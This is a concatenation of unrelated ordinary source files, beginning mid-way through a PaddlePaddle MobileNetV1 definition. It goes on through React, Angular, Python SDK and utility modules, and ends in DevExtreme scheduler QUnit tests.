padding, channels=None, num_groups=1, act='relu', name=None): super(ConvBNLayer, self).__init__() self._conv = Conv2D( in_channels=num_channels, out_channels=num_filters, kernel_size=filter_size, stride=stride, padding=padding, groups=num_groups, weight_attr=ParamAttr( initializer=KaimingNormal(), name=name + "_weights"), bias_attr=False) self._batch_norm = BatchNorm( num_filters, act=act, param_attr=ParamAttr(name + "_bn_scale"), bias_attr=ParamAttr(name + "_bn_offset"), moving_mean_name=name + "_bn_mean", moving_variance_name=name + "_bn_variance") def forward(self, inputs): y = self._conv(inputs) y = self._batch_norm(y) return y class DepthwiseSeparable(nn.Layer): def __init__(self, num_channels, num_filters1, num_filters2, num_groups, stride, scale, name=None): super(DepthwiseSeparable, self).__init__() self._depthwise_conv = ConvBNLayer( num_channels=num_channels, num_filters=int(num_filters1 * scale), filter_size=3, stride=stride, padding=1, num_groups=int(num_groups * scale), name=name + "_dw") self._pointwise_conv = ConvBNLayer( num_channels=int(num_filters1 * scale), filter_size=1, num_filters=int(num_filters2 * scale), stride=1, padding=0, name=name + "_sep") def forward(self, inputs): y = self._depthwise_conv(inputs) y = self._pointwise_conv(y) return y class MobileNet(nn.Layer): def __init__(self, scale=1.0, class_dim=1000): super(MobileNet, self).__init__() self.scale = scale self.block_list = [] self.conv1 = ConvBNLayer( num_channels=3, filter_size=3, channels=3, num_filters=int(32 * scale), stride=2, padding=1, name="conv1") conv2_1 = self.add_sublayer( "conv2_1", sublayer=DepthwiseSeparable( num_channels=int(32 * scale), num_filters1=32, num_filters2=64, num_groups=32, stride=1, scale=scale, name="conv2_1")) self.block_list.append(conv2_1) conv2_2 = self.add_sublayer( "conv2_2", sublayer=DepthwiseSeparable( num_channels=int(64 * scale), num_filters1=64, num_filters2=128, num_groups=64, stride=2, scale=scale, name="conv2_2")) self.block_list.append(conv2_2) conv3_1 = self.add_sublayer( "conv3_1", sublayer=DepthwiseSeparable( num_channels=int(128 * scale), num_filters1=128, num_filters2=128, num_groups=128, stride=1, scale=scale, name="conv3_1")) self.block_list.append(conv3_1) conv3_2 = self.add_sublayer( "conv3_2", sublayer=DepthwiseSeparable( num_channels=int(128 * scale), num_filters1=128, num_filters2=256, num_groups=128, stride=2, scale=scale, name="conv3_2")) self.block_list.append(conv3_2) conv4_1 = self.add_sublayer( "conv4_1", sublayer=DepthwiseSeparable( num_channels=int(256 * scale), num_filters1=256, num_filters2=256, num_groups=256, stride=1, scale=scale, name="conv4_1")) self.block_list.append(conv4_1) conv4_2 = self.add_sublayer( "conv4_2", sublayer=DepthwiseSeparable( num_channels=int(256 * scale), num_filters1=256, num_filters2=512, num_groups=256, stride=2, scale=scale, name="conv4_2")) self.block_list.append(conv4_2) for i in range(5): conv5 = self.add_sublayer( "conv5_" + str(i + 1), sublayer=DepthwiseSeparable( num_channels=int(512 * scale), num_filters1=512, num_filters2=512, num_groups=512, stride=1, scale=scale, name="conv5_" + str(i + 1))) self.block_list.append(conv5) conv5_6 = self.add_sublayer( "conv5_6", sublayer=DepthwiseSeparable( num_channels=int(512 * scale), num_filters1=512, num_filters2=1024, num_groups=512, stride=2, scale=scale, name="conv5_6")) self.block_list.append(conv5_6) conv6 = self.add_sublayer( "conv6", sublayer=DepthwiseSeparable( num_channels=int(1024 * scale), num_filters1=1024, num_filters2=1024, num_groups=1024, stride=1, scale=scale, name="conv6")) self.block_list.append(conv6) self.pool2d_avg = AdaptiveAvgPool2D(1) self.out = Linear( int(1024 * scale), class_dim, weight_attr=ParamAttr( initializer=KaimingNormal(), name="fc7_weights"), bias_attr=ParamAttr(name="fc7_offset")) def forward(self, inputs): y = self.conv1(inputs) for block in self.block_list: y = block(y) y = self.pool2d_avg(y) y = paddle.flatten(y, start_axis=1, stop_axis=-1) y = self.out(y) return y def _load_pretrained(pretrained, model, model_url, use_ssld=False): if pretrained is False: pass elif pretrained is True: load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) elif isinstance(pretrained, str): load_dygraph_pretrain(model, pretrained) else: raise RuntimeError( "pretrained type is not available. Please use `string` or `boolean` type." ) def MobileNetV1_x0_25(pretrained=False, use_ssld=False, **kwargs): model = MobileNet(scale=0.25, **kwargs) _load_pretrained(pretrained, model, MODEL_URLS["MobileNetV1_x0_25"], use_ssld=use_ssld) return model def MobileNetV1_x0_5(pretrained=False, use_ssld=False, **kwargs): model = MobileNet(scale=0.5, **kwargs) _load_pretrained(pretrained, model, MODEL_URLS["MobileNetV1_x0_5"], use_ssld=use_ssld) return model def MobileNetV1_x0_75(pretrained=False, use_ssld=False, **kwargs): model = MobileNet(scale=0.75, **kwargs) _load_pretrained(pretrained, model, MODEL_URLS["MobileNetV1_x0_75"], use_ssld=use_ssld) return model def MobileNetV1(pretrained=False, use_ssld=False, **kwargs): model = MobileNet(scale=1.0, **kwargs) _load_pretrained(pretrained, model, MODEL_URLS["MobileNetV1"], use_ssld=use_ssld) return model
const prompts = require('prompts'); const { gray, red } = require('kleur'); const { write } = require('clipboardy'); const { getEnvPath } = require('./util'); const PATHS = getEnvPath(); const promptsConfig = { type: 'autocomplete', name: 'path', message: 'Search and Copy', choices: PATHS.map(path => ({ title: path })), limit: 15, fallback: 'No matches found', suggest: suggestByTitle, }; // For better searching - https://github.com/terkelg/prompts/issues/158 function suggestByTitle(input, choices) { return Promise.resolve(choices.filter(choice => choice.title.includes(input))); } async function searchPaths() { const res = await prompts(promptsConfig); if (Object.keys(res).length === 0) { console.log(red('Aborted!')); process.exit(); } if (!res.path) { console.log(gray('No matches found!')); process.exit(); } try { await write(res.path); console.log(gray('Selection has been copied to clipboard')); } catch (err) { console.error(err); } } module.exports = searchPaths;
module.exports = { Article: require("./Article"), Comment: require("./Comment") };
"use strict"; angular.module('psMenu').controller('psMenuController', [ '$scope', '$rootScope', function($scope, $rootScope){ this.setActiveElement = function(el) { $scope.activeElement = el; }; this.setRoute = function(route){ $rootScope.broadcast('ps-menu-item-selected-event', {route: route}); }; /*$scope.showMenu = true; $scope.isVertical = true; this.setActiveElement = function(el) { $scope.activeElement = el; }; this.isVertical = function(){ return $scope.isVertical; }; this.getActiveElement = function(){ return $scope.activeElement; }; this.setRoute = function(route){ $rootScope.$broadcast('ps-menu-item-selected-event', { route: route }); }; $scope.$on('ps-menu-show', function(event, data){ $scope.showMenu = data.show; }); $scope.toggleMenuOrientation = function(){ $scope.isVertical = !$scope.isVertical; $rootScope.$broadcast('ps-menu-orientation-changed-event', { isMenVertical: $scope.isVertical }); };*/ } ]);
var searchData= [ ['gen',['Gen',['../d3/d8d/structnlohmann_1_1detail_1_1utility__internal_1_1Gen.html',1,'nlohmann::detail::utility_internal']]], ['gen_3c_20t_2c_200_20_3e',['Gen&lt; T, 0 &gt;',['../d9/d5f/structnlohmann_1_1detail_1_1utility__internal_1_1Gen_3_01T_00_010_01_4.html',1,'nlohmann::detail::utility_internal']]] ];
# these are the IDs of the DS18B20's # and their corresponding names displayed on the clock sensornames = { '0000058e0f0c' : 'Inside', '0000031b462b' : 'Closer', '0000031b3dae' : 'Farther', '0000031b54e7' : 'Outside', '0000031b4f09' : 'Inside2' }
import React from 'react'; import './style.css' import pokemonType from '../../helpers/pokemonTypes' function Card({ pokemon }) { return ( <div className= 'card'> <div className = 'card__img'> <img src={ pokemon.sprites.front_default } alt=""></img> </div> <h5 className = 'card-title'> { pokemon.name } </h5> <div className = 'card__types'> { pokemon.types.map(type =>{ return ( <div className = 'card__type' style={{backgroundColor: pokemonType[type.type.name]}}> {type.type.name} </div> ) })} </div> <div className ='card__info'> <div className = 'card__data'> <p className='try'>Weight: { pokemon.weight} </p> <p className='try'>Height: { pokemon.height} </p> </div> <div className = 'card__data'> <p className='try'>Order: { pokemon.order} </p> <p className='try'>base: { pokemon.base_experience} </p> </div> <div className = 'card__data'> </div> <div className = 'card__data'> <p className=''>Abilities: { pokemon.abilities.map(ability =>{ return ( <p>{ability.ability.name}</p> ) })} </p> </div> </div> </div> ) } export default Card;
# coding=utf-8 # -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for # license information. # # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is # regenerated. # -------------------------------------------------------------------------- from msrest.pipeline import ClientRawResponse from .. import models class HttpServerFailureOperations(object): """HttpServerFailureOperations operations. :param client: Client for service requests. :param config: Configuration of service client. :param serializer: An object model serializer. :param deserializer: An object model deserializer. """ def __init__(self, client, config, serializer, deserializer): self._client = client self._serialize = serializer self._deserialize = deserializer self.config = config def head501( self, custom_headers=None, raw=False, **operation_config): """Return 501 status code - should be represented in the client as an error. :param dict custom_headers: headers that will be added to the request :param bool raw: returns the direct response alongside the deserialized response :param operation_config: :ref:`Operation configuration overrides<msrest:optionsforoperations>`. :rtype: :class:`Error <Fixtures.AcceptanceTestsHttp.models.Error>` :rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>` if raw=true :raises: :class:`ErrorException<Fixtures.AcceptanceTestsHttp.models.ErrorException>` """ # Construct URL url = '/http/failure/server/501' # Construct parameters query_parameters = {} # Construct headers header_parameters = {} header_parameters['Content-Type'] = 'application/json; charset=utf-8' if custom_headers: header_parameters.update(custom_headers) # Construct and send request request = self._client.head(url, query_parameters) response = self._client.send(request, header_parameters, **operation_config) if response.status_code < 200 or response.status_code >= 300: raise models.ErrorException(self._deserialize, response) if raw: client_raw_response = ClientRawResponse(None, response) return client_raw_response def get501( self, custom_headers=None, raw=False, **operation_config): """Return 501 status code - should be represented in the client as an error. :param dict custom_headers: headers that will be added to the request :param bool raw: returns the direct response alongside the deserialized response :param operation_config: :ref:`Operation configuration overrides<msrest:optionsforoperations>`. :rtype: :class:`Error <Fixtures.AcceptanceTestsHttp.models.Error>` :rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>` if raw=true :raises: :class:`ErrorException<Fixtures.AcceptanceTestsHttp.models.ErrorException>` """ # Construct URL url = '/http/failure/server/501' # Construct parameters query_parameters = {} # Construct headers header_parameters = {} header_parameters['Content-Type'] = 'application/json; charset=utf-8' if custom_headers: header_parameters.update(custom_headers) # Construct and send request request = self._client.get(url, query_parameters) response = self._client.send(request, header_parameters, **operation_config) if response.status_code < 200 or response.status_code >= 300: raise models.ErrorException(self._deserialize, response) if raw: client_raw_response = ClientRawResponse(None, response) return client_raw_response def post505( self, boolean_value=None, custom_headers=None, raw=False, **operation_config): """Return 505 status code - should be represented in the client as an error. :param boolean_value: Simple boolean value true :type boolean_value: bool :param dict custom_headers: headers that will be added to the request :param bool raw: returns the direct response alongside the deserialized response :param operation_config: :ref:`Operation configuration overrides<msrest:optionsforoperations>`. :rtype: :class:`Error <Fixtures.AcceptanceTestsHttp.models.Error>` :rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>` if raw=true :raises: :class:`ErrorException<Fixtures.AcceptanceTestsHttp.models.ErrorException>` """ # Construct URL url = '/http/failure/server/505' # Construct parameters query_parameters = {} # Construct headers header_parameters = {} header_parameters['Content-Type'] = 'application/json; charset=utf-8' if custom_headers: header_parameters.update(custom_headers) # Construct body if boolean_value is not None: body_content = self._serialize.body(boolean_value, 'bool') else: body_content = None # Construct and send request request = self._client.post(url, query_parameters) response = self._client.send( request, header_parameters, body_content, **operation_config) if response.status_code < 200 or response.status_code >= 300: raise models.ErrorException(self._deserialize, response) if raw: client_raw_response = ClientRawResponse(None, response) return client_raw_response def delete505( self, boolean_value=None, custom_headers=None, raw=False, **operation_config): """Return 505 status code - should be represented in the client as an error. :param boolean_value: Simple boolean value true :type boolean_value: bool :param dict custom_headers: headers that will be added to the request :param bool raw: returns the direct response alongside the deserialized response :param operation_config: :ref:`Operation configuration overrides<msrest:optionsforoperations>`. :rtype: :class:`Error <Fixtures.AcceptanceTestsHttp.models.Error>` :rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>` if raw=true :raises: :class:`ErrorException<Fixtures.AcceptanceTestsHttp.models.ErrorException>` """ # Construct URL url = '/http/failure/server/505' # Construct parameters query_parameters = {} # Construct headers header_parameters = {} header_parameters['Content-Type'] = 'application/json; charset=utf-8' if custom_headers: header_parameters.update(custom_headers) # Construct body if boolean_value is not None: body_content = self._serialize.body(boolean_value, 'bool') else: body_content = None # Construct and send request request = self._client.delete(url, query_parameters) response = self._client.send( request, header_parameters, body_content, **operation_config) if response.status_code < 200 or response.status_code >= 300: raise models.ErrorException(self._deserialize, response) if raw: client_raw_response = ClientRawResponse(None, response) return client_raw_response
from .base_match import BaseMatchAdapter from chatterbot.utils.pos_tagger import POSTagger from chatterbot.utils.stop_words import StopWordsManager from chatterbot.utils.word_net import Wordnet class ClosestMeaningAdapter(BaseMatchAdapter): """ This adapter selects a response by comparing the tokenized form of the input statement's text, with the tokenized form of possible matching statements. For each possible match, the sum of the Cartesian product of the path similarity of each statement is compared. This process simulates an evaluation of the closeness of synonyms. The known statement with the greatest path similarity is then returned. """ def __init__(self, **kwargs): super(ClosestMeaningAdapter, self).__init__(**kwargs) self.wordnet = Wordnet() self.tagger = POSTagger() self.stopwords = StopWordsManager() def get_tokens(self, text, exclude_stop_words=True): """ Takes a string and converts it to a tuple of each word. Skips common stop words such as ("is, the, a, ...") is 'exclude_stop_words' is True. """ lower = text.lower() tokens = self.tagger.tokenize(lower) # Remove any stop words from the string if exclude_stop_words: excluded_words = self.stopwords.words("english") tokens = set(tokens) - set(excluded_words) return tokens def get_similarity(self, string1, string2): """ Calculate the similarity of two statements. This is based on the total similarity between each word in each sentence. """ import itertools tokens1 = self.get_tokens(string1) tokens2 = self.get_tokens(string2) total_similarity = 0 # Get the highest matching value for each possible combination of words for combination in itertools.product(*[tokens1, tokens2]): synset1 = self.wordnet.synsets(combination[0]) synset2 = self.wordnet.synsets(combination[1]) if synset1 and synset2: max_similarity = 0 # Get the highest similarity for each combination of synsets for synset in itertools.product(*[synset1, synset2]): similarity = synset[0].path_similarity(synset[1]) if similarity and (similarity > max_similarity): max_similarity = similarity # Add the most similar path value to the total total_similarity += max_similarity return total_similarity def get(self, input_statement): """ Takes a statement string and a list of statement strings. Returns the closest matching statement from the list. """ statement_list = self.context.storage.get_response_statements() if not statement_list: if self.has_storage_context: # Use a randomly picked statement return 0, self.context.storage.get_random() else: raise self.EmptyDatasetException() # Get the text of each statement text_of_all_statements = [] for statement in statement_list: text_of_all_statements.append(statement.text) # Check if an exact match exists if input_statement.text in text_of_all_statements: return 1, input_statement closest_statement = None closest_similarity = -1 total_similarity = 0 # For each option in the list of options for statement in text_of_all_statements: similarity = self.get_similarity(input_statement.text, statement) total_similarity += similarity if similarity > closest_similarity: closest_similarity = similarity closest_statement = statement try: confidence = closest_similarity / total_similarity except: confidence = 0 return confidence, next( (s for s in statement_list if s.text == closest_statement), None )
function fn7(items) { var els = []; for (var i = 0; i < items.length; i++) { els.push(<div id="id" key={i} />); } return els; }
#!/usr/bin/env node // this script is to be used during development and will regenerate the ws_server.js file // by concating the files in the ws folder according to the order of the WSFiles array // it basically allows you to write the code for your server app in multiple files. const fs = require('fs') const path = require('path') console.log("regenerating ws_server.js"); // update this array according to your needs let WsFiles = ["header.js", "server.js", "utility.js", "lsdata.js" , "clients.js", "storedata.js", "transaction.js", "handle.js", "startup.js"] let start = "#!/usr/bin/env node\n" fs.writeFileSync(path.join(__dirname, "ws_server.js" ) , start) WsFiles.forEach((item, i) => { fs.appendFileSync(path.join(__dirname, "ws_server.js"), fs.readFileSync( path.join(__dirname, "ws" , item ),'utf8')); });
import sys if sys.version_info.major == 2: from aenum import Enum else: from enum import Enum import threading import time class ConnectionStateChecker(object): def __init__( self, ping_function, keep_alive_interval, sleep=1): self.sleep = sleep self.keep_alive_interval = keep_alive_interval self.last_message = time.time() self.ping_function = ping_function self.running = False self._thread = None def start(self): self.running = True self._thread = threading.Thread(target=self.run) self._thread.daemon = True self._thread.start() def run(self): while self.running: time.sleep(self.sleep) time_without_messages = time.time() - self.last_message if self.keep_alive_interval < time_without_messages: self.ping_function() def stop(self): self.running = False class ReconnectionType(Enum): raw = 0 # Reconnection with max reconnections and constant sleep time interval = 1 # variable sleep time class ReconnectionHandler(object): def __init__(self): self.reconnecting = False self.attempt_number = 0 self.last_attempt = time.time() def next(self): raise NotImplementedError() def reset(self): self.attempt_number = 0 self.reconnecting = False class RawReconnectionHandler(ReconnectionHandler): def __init__(self, sleep_time, max_attempts): super(RawReconnectionHandler, self).__init__() self.sleep_time = sleep_time self.max_reconnection_attempts = max_attempts def next(self): self.reconnecting = True if self.max_reconnection_attempts is not None: if self.attempt_number <= self.max_reconnection_attempts: self.attempt_number += 1 return self.sleep_time else: raise ValueError("Max attemps reached {0}".format(self.max_reconnection_attempts)) else: # Infinite reconnect return self.sleep_time class IntervalReconnectionHandler(ReconnectionHandler): def __init__(self, intervals): super(IntervalReconnectionHandler, self).__init__() self._intervals = intervals def next(self): self.reconnecting = True index = self.attempt_number self.attempt_number += 1 if index >= len(self._intervals): raise ValueError("Max intervals reached {0}".format(self._intervals)) return self._intervals[index]
""" Set up the plot figures, axes, and items to be done for each frame. This module is imported by the plotting routines and then the function setplot is called to set the plot parameters. """ #-------------------------- def setplot(plotdata): #-------------------------- """ Specify what is to be plotted at each frame. Input: plotdata, an instance of pyclaw.plotters.data.ClawPlotData. Output: a modified version of plotdata. """ from pyclaw.plotters import colormaps plotdata.clearfigures() # clear any old figures,axes,items data # Figure for pcolor plot plotfigure = plotdata.new_plotfigure(name='q[0]', figno=0) # Set up for axes in this figure: plotaxes = plotfigure.new_plotaxes() plotaxes.xlimits = 'auto' plotaxes.ylimits = 'auto' plotaxes.title = 'q[0]' plotaxes.afteraxes = "pylab.axis('scaled')" # Set up for item on these axes: plotitem = plotaxes.new_plotitem(plot_type='2d_pcolor') plotitem.plot_var = 0 plotitem.pcolor_cmap = colormaps.yellow_red_blue plotitem.pcolor_cmin = 0.0 plotitem.pcolor_cmax = 1.0 plotitem.add_colorbar = True plotitem.show = True # show on plot? # Figure for contour plot plotfigure = plotdata.new_plotfigure(name='contour', figno=1) # Set up for axes in this figure: plotaxes = plotfigure.new_plotaxes() plotaxes.xlimits = 'auto' plotaxes.ylimits = 'auto' plotaxes.title = 'q[0]' plotaxes.afteraxes = "pylab.axis('scaled')" # Set up for item on these axes: plotitem = plotaxes.new_plotitem(plot_type='2d_contour') plotitem.plot_var = 0 plotitem.contour_nlevels = 20 plotitem.contour_min = 0.01 plotitem.contour_max = 0.99 plotitem.amr_contour_colors = ['b','k','r'] plotitem.show = True # show on plot? # Parameters used only when creating html and/or latex hardcopy # e.g., via pyclaw.plotters.frametools.printframes: plotdata.printfigs = True # print figures plotdata.print_format = 'png' # file format plotdata.print_framenos = 'all' # list of frames to print plotdata.print_fignos = 'all' # list of figures to print plotdata.html = True # create html files of plots? plotdata.html_homelink = '../README.html' # pointer for top of index plotdata.latex = True # create latex file of plots? plotdata.latex_figsperline = 2 # layout of plots plotdata.latex_framesperline = 1 # layout of plots plotdata.latex_makepdf = False # also run pdflatex? return plotdata
# Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. from aliyunsdkcore.request import RpcRequest class DescribeRealtimeDiagnosesRequest(RpcRequest): def __init__(self): RpcRequest.__init__(self, 'Rds', '2014-08-15', 'DescribeRealtimeDiagnoses','rds') def get_ResourceOwnerId(self): return self.get_query_params().get('ResourceOwnerId') def set_ResourceOwnerId(self,ResourceOwnerId): self.add_query_param('ResourceOwnerId',ResourceOwnerId) def get_ResourceOwnerAccount(self): return self.get_query_params().get('ResourceOwnerAccount') def set_ResourceOwnerAccount(self,ResourceOwnerAccount): self.add_query_param('ResourceOwnerAccount',ResourceOwnerAccount) def get_OwnerAccount(self): return self.get_query_params().get('OwnerAccount') def set_OwnerAccount(self,OwnerAccount): self.add_query_param('OwnerAccount',OwnerAccount) def get_PageSize(self): return self.get_query_params().get('PageSize') def set_PageSize(self,PageSize): self.add_query_param('PageSize',PageSize) def get_EndTime(self): return self.get_query_params().get('EndTime') def set_EndTime(self,EndTime): self.add_query_param('EndTime',EndTime) def get_DBInstanceId(self): return self.get_query_params().get('DBInstanceId') def set_DBInstanceId(self,DBInstanceId): self.add_query_param('DBInstanceId',DBInstanceId) def get_StartTime(self): return self.get_query_params().get('StartTime') def set_StartTime(self,StartTime): self.add_query_param('StartTime',StartTime) def get_OwnerId(self): return self.get_query_params().get('OwnerId') def set_OwnerId(self,OwnerId): self.add_query_param('OwnerId',OwnerId) def get_PageNumber(self): return self.get_query_params().get('PageNumber') def set_PageNumber(self,PageNumber): self.add_query_param('PageNumber',PageNumber)
var Setting = function () { function changeSelect() { $('select').on('change', function() { var str = this.id; var value = 'fa fa-fw fa-' + this.value; var idChange = str.split('_')[1]; $("#fa_" + idChange).removeClass().addClass(value); }) } /** * Set function */ function init() { changeSelect(); } return { init: init }; }();
# -*- coding: utf-8 -*- # Copyright SweetCase Project, Re_Coma(Ha Jeong Hyun). All Rights Reserved. # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from .label.connect_label import * from .connectiondata import * from .queuemodel import * """ 클라이언트로부터 받는 연결 요청 데이터를 저장하는 구조 queuemodel.py의 QueueModel로부터 상속을 받는다. """ class ConnectionDataQueue(QueueModel): """ 클라이언트로부터 받는 연결 요청 데이터를 저장하는 구조 queuemodel.py의 QueueModel로부터 상속을 받는다. """ def __init__(self, maxSize): super().__init__(maxSize) def put(self, data): # data type 판정 if isinstance(data, ConnectionData) is False: raise TypeError("data must be connectiondata") # max Size 판정 if self.currentSize() == self.maxSize: raise ValueError("queue is aleady full") self.dataContainer.append(data)
"use strict"; /** * @license * Copyright 2014 Palantir Technologies, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ Object.defineProperty(exports, "__esModule", { value: true }); var tslib_1 = require("tslib"); var ts = require("typescript"); var Lint = require("../index"); var Rule = /** @class */ (function (_super) { tslib_1.__extends(Rule, _super); function Rule() { return _super !== null && _super.apply(this, arguments) || this; } /* tslint:enable:object-literal-sort-keys */ Rule.FAILURE_STRING = function (name) { return "variable '" + name + "' used before declaration"; }; Rule.prototype.applyWithProgram = function (sourceFile, program) { return this.applyWithFunction(sourceFile, walk, undefined, program.getTypeChecker()); }; /* tslint:disable:object-literal-sort-keys */ Rule.metadata = { ruleName: "no-use-before-declare", description: "Disallows usage of variables before their declaration.", descriptionDetails: (_a = ["\n This rule is primarily useful when using the `var` keyword -\n the compiler will detect if a `let` and `const` variable is used before it is declared."], _a.raw = ["\n This rule is primarily useful when using the \\`var\\` keyword -\n the compiler will detect if a \\`let\\` and \\`const\\` variable is used before it is declared."], Lint.Utils.dedent(_a)), optionsDescription: "Not configurable.", options: null, optionExamples: [true], type: "functionality", typescriptOnly: false, requiresTypeInfo: true, }; return Rule; }(Lint.Rules.TypedRule)); exports.Rule = Rule; function walk(ctx, checker) { return ts.forEachChild(ctx.sourceFile, function recur(node) { switch (node.kind) { case ts.SyntaxKind.TypeReference: // Ignore types. return; case ts.SyntaxKind.PropertyAccessExpression: // Ignore `y` in `x.y`, but recurse to `x`. return recur(node.expression); case ts.SyntaxKind.Identifier: return checkIdentifier(node, checker.getSymbolAtLocation(node)); case ts.SyntaxKind.ExportSpecifier: return checkIdentifier(node.name, checker.getExportSpecifierLocalTargetSymbol(node)); default: return ts.forEachChild(node, recur); } }); function checkIdentifier(node, symbol) { var declarations = symbol === undefined ? undefined : symbol.declarations; if (declarations === undefined || declarations.length === 0) { return; } var declaredBefore = declarations.some(function (decl) { switch (decl.kind) { case ts.SyntaxKind.FunctionDeclaration: // Functions may be declared later. return true; default: // Use `<=` in case this *is* the declaration. // If it's a global declared in a different file, OK. return decl.pos <= node.pos || decl.getSourceFile() !== ctx.sourceFile; } }); if (!declaredBefore) { ctx.addFailureAtNode(node, Rule.FAILURE_STRING(node.text)); } } } var _a;
import $ from 'jquery'; QUnit.testStart(function() { $('#qunit-fixture').html( '<div id="scheduler">\ <div data-options="dxTemplate: { name: \'template\' }">Task Template</div>\ </div>'); }); import 'generic_light.css!'; import 'ui/scheduler/ui.scheduler'; import 'ui/switch'; import { createWrapper, SchedulerTestWrapper } from '../../helpers/scheduler/helpers.js'; const createInstance = function(options) { const instance = $('#scheduler').dxScheduler(options).dxScheduler('instance'); return new SchedulerTestWrapper(instance); }; import translator from 'animation/translator'; import fx from 'animation/fx'; import pointerMock from '../../helpers/pointerMock.js'; import Color from 'color'; import { DataSource } from 'data/data_source/data_source'; import dataUtils from 'core/element_data'; import timeZoneUtils from 'ui/scheduler/utils.timeZone'; const DATE_TABLE_CELL_CLASS = 'dx-scheduler-date-table-cell'; const APPOINTMENT_CLASS = 'dx-scheduler-appointment'; const APPOINTMENT_DEFAULT_LEFT_OFFSET = 26; QUnit.module('Integration: Appointments on vertical views (day, week, workWeek)', { beforeEach: function() { fx.off = true; this.createInstance = function(options) { this.scheduler = createWrapper(options); this.instance = this.scheduler.instance; }; this.getAppointmentColor = function($task, checkedProperty) { checkedProperty = checkedProperty || 'backgroundColor'; return new Color($task.css(checkedProperty)).toHex(); }; this.clock = sinon.useFakeTimers(); this.tasks = [ { text: 'Task 1', startDate: new Date(2015, 1, 9, 1, 0), endDate: new Date(2015, 1, 9, 2, 0) }, { text: 'Task 2', startDate: new Date(2015, 1, 9, 11, 0), endDate: new Date(2015, 1, 9, 12, 0) } ]; }, afterEach: function() { fx.off = false; this.clock.restore(); } }, () => { QUnit.test('Appointments on Day view should have a right height and position if startDate begins day before', function(assert) { this.createInstance({ dataSource: [{ startDate: new Date(2016, 9, 5, 23, 30), endDate: new Date(2016, 9, 6, 1), text: 'new Date sample' }], currentDate: new Date(2016, 9, 6), views: ['day'], currentView: 'day', cellDuration: 60 }); const $element = this.instance.$element(); const $appointment = $element.find('.' + APPOINTMENT_CLASS); const cellHeight = $element.find('.' + DATE_TABLE_CELL_CLASS).first().get(0).getBoundingClientRect().height; assert.equal($appointment.position().top, 0, 'Appointment has a right top position'); assert.equal($appointment.outerHeight(), cellHeight, 'Appointment has a right height'); }); QUnit.test('Appointments on Week view should have a right position if widget is small', function(assert) { this.createInstance({ dataSource: [{ startDate: new Date(2016, 9, 6, 1), endDate: new Date(2016, 9, 6, 3), text: 'new Date sample' }], currentDate: new Date(2016, 9, 6), views: ['week'], width: 350, currentView: 'week', cellDuration: 60 }); const $element = this.instance.$element(); const $appointment = $element.find('.' + APPOINTMENT_CLASS); const cellWidth = $element.find('.' + DATE_TABLE_CELL_CLASS).first().outerWidth(); assert.roughEqual($appointment.position().left, cellWidth * 4 + 50, 2, 'Appointment has a right left position'); }); QUnit.test('Appointment with resources should have a right height and position if it ends on the next day', function(assert) { this.createInstance({ dataSource: [{ startDate: new Date(2017, 6, 22, 20), endDate: new Date(2017, 6, 23, 4), text: 'Appointment', ownerId: 1 }], groups: ['ownerId'], resources: [ { field: 'ownerId', dataSource: [ { id: 1, text: 'one' }, { id: 2, text: 'two' } ] } ], currentDate: new Date(2017, 6, 22), views: ['day'], currentView: 'day', cellDuration: 60 }); const $element = this.instance.$element(); const $appointment = $element.find('.' + APPOINTMENT_CLASS); const cellHeight = $element.find('.' + DATE_TABLE_CELL_CLASS).first().get(0).getBoundingClientRect().height; assert.equal($appointment.length, 1, 'Only one appt is rendered'); assert.equal($appointment.position().top, cellHeight * 20, 'Appointment has a right top position'); assert.equal($appointment.outerHeight(), cellHeight * 4, 'Appointment has a right height'); }); QUnit.test('Breaking an appointment into parts depends on the timezone', function(assert) { const scheduler = createInstance({ dataSource: [{ startDate: '2017-05-24T20:15:00+01:00', endDate: '2017-05-25T01:30:00+01:00', text: 'Test task' }], timeZone: 'America/Los_Angeles', currentDate: new Date(2017, 4, 25), views: ['week'], currentView: 'week', cellDuration: 60 }); assert.equal(scheduler.appointments.getAppointmentCount(), 1, 'Appointment has 1 part'); }); QUnit.test('Breaking an appointment into parts should work correctly when endDate is a midnight', function(assert) { const scheduler = createInstance({ dataSource: [{ startDate: '2017-05-24T20:15:00+01:00', endDate: '2017-05-25T08:00:00+01:00', text: 'Test task' }], timeZone: 'America/Los_Angeles', currentDate: new Date(2017, 4, 25), views: ['week'], currentView: 'week', cellDuration: 60 }); assert.equal(scheduler.appointments.getAppointmentCount(), 1, 'Appointment has 1 part'); }); QUnit.test('The part of the appointment that ends after midnight should be shown on Week view', function(assert) { this.createInstance({ dataSource: [{ startDate: new Date(2015, 4, 25, 22, 0), endDate: new Date(2015, 4, 26, 2, 15), text: 'Test task' }], currentDate: new Date(2015, 4, 25), views: ['week'], currentView: 'week', cellDuration: 60 }); const $element = this.instance.$element(); const $appointment = $element.find('.' + APPOINTMENT_CLASS); assert.equal($appointment.length, 2, 'ok'); 